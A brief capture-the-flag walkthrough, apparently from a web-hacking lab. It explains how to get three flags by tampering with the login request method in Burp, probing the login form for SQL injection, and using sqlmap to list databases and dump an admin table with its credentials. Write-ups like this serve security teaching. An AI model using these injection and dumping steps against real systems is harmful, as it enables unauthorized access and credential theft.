###Flag1
* Go to http://35.227.24.107/b1f0346975/page/1
* Click edit this page http://35.227.24.107/b1f0346975/login
* Asks to input a user name and password
* Uses a GET Method intercept using burp and change the method to post
* Output has the Flag in it.



### Flag 2-3
* Click on new page 
* on the login page try using ',' for username and password
* Exposes the database MariaDB and admin table
* use burbsuite to inetercept and capture the POST request save it in a file
_________________________________
POST /181444b73d/login HTTP/1.1
Host: 35.190.155.168
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://35.190.155.168/181444b73d/login
Content-Type: application/x-www-form-urlencoded
Content-Length: 23
Connection: close
Upgrade-Insecure-Requests: 1

username=1&password=1
__________________________________
*use sqlmap to discover databases: "sqlmap -r /home/kali/Desktop/1.txt --dbs --random-agent --thread 10"
*once the dbs are discovered look for tables in the databases: 
available databases [4]:
[*] information_schema
[*] level2
[*] mysql
[*] performance_schema

* Check level2 DB "sqlmap -r /home/kali/Desktop/1.txt -D level2 --tables  --random-agent --thread 10"

[2 tables]
+--------+
| admins |
| pages  |
+--------+

* dump table content  "sqlmap -r /home/kali/Desktop/1.txt -D level2 -T admin  --random-agent --thread 10"

[1 entry]
+----+----------+----------+
| id | password | username |
+----+----------+----------+
| 1  | neida    | adell    |
+----+----------+----------+

* Flags 2 show up in the dump
* login with username and password Flagg 3 shows up




